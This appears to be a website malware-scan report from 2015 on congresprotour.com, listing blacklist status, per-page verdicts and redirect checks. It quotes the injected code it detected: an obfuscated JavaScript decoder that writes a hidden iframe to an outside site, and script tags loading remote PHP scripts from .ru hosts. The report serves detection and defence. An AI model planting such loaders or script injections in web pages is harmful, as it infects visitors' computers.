Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=congresprotour.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://congresprotour.com/ | 200 OK Content-Length: 6871 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://congresprotour.com/index-2.html | 200 OK Content-Length: 6314 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kpo-marketru.122.com1.ru/wy84gznd.php?id=69082309"></script> | ||
http://congresprotour.com/incentives.html | 200 OK Content-Length: 5786 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kpo-marketru.122.com1.ru/wy84gznd.php?id=69082308"></script> | ||
http://congresprotour.com/congres3.html | 200 OK Content-Length: 6838 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kpo-marketru.122.com1.ru/wy84gznd.php?id=69082306"></script> | ||
http://congresprotour.com/congres4.html | 200 OK Content-Length: 5893 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kpo-marketru.122.com1.ru/wy84gznd.php?id=69082307"></script> | ||
http://congresprotour.com/eng/index.html | 200 OK Content-Length: 6036 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082338"></script> | ||
http://congresprotour.com/eng/ | 200 OK Content-Length: 6036 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082338"></script> | ||
http://congresprotour.com/eng/incentives.html | 200 OK Content-Length: 5591 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082337"></script> | ||
http://congresprotour.com/eng/congres3.html | 200 OK Content-Length: 6327 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082334"></script> | ||
http://congresprotour.com/eng/congres4.html | 200 OK Content-Length: 5707 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082335"></script> | ||
http://congresprotour.com/test404page.js | 404 Not Found Content-Length: 964 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: congresprotour.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 02:29:31 GMT
Accept-Ranges: bytes
ETag: "8010ab-1ad7-509d54021a75f"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6871
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 04:39:52 GMT
X-Powered-By: PleskLin
...6871 bytes of data.
GET / HTTP/1.1
Host: congresprotour.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 02:29:31 GMT
Accept-Ranges: bytes
ETag: "8010ab-1ad7-509d54021a75f"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6871
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 04:39:52 GMT
X-Powered-By: PleskLin
...6871 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: congresprotour.com
Referer: http://www.google.com/search?q=congresprotour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: congresprotour.com
Referer: http://www.google.com/search?q=congresprotour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.